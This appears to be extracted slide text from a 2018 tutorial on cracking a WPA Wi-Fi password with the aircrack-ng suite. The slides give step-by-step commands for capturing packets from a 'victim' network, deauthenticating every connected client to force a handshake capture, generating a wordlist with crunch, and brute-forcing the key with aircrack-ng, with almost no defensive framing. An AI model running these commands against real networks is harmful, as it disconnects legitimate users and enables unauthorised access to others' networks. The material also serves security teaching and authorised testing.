  • 30. “airodump-ng -c channel –bssid [bssid of Wi-Fi] -w [path to write the data of packets] wlan0mon[interface]” command • -bssid in my case bssid is indicated with red mark. • -c channel is the channel of victim Wi-Fi in my case it is 10(see in previous screenshot for channel number) • -w It is used to write the captured data to a specified path in my case it is ‘/root/Desktop/hack’. • Interface in my case is wlan0mon 12/18/2018ahmadyark1@gmail.com 30
  • 33. “aireplay-ng –deauth 10 -a [router bssid] interface” command •In this step we DE authenticate the connected clients to theWi-Fi •All the users connected toWi-Fi router disconnects. 12/18/2018ahmadyark1@gmail.com 33
  • 35. •After this the client tries to connect to theWi-Fi again. At that time, we will capture the packets which sends from client. From this result, we will get wpa handshake. 12/18/2018ahmadyark1@gmail.com 35
  • 38. “Crunch 8 8 1234abcd –o wordlist” command 12/18/2018ahmadyark1@gmail.com 38
  • 39. “aircrack-ng -b [bssid of router] -w [path to word list] [path to capture packets]” command 12/18/2018ahmadyark1@gmail.com 39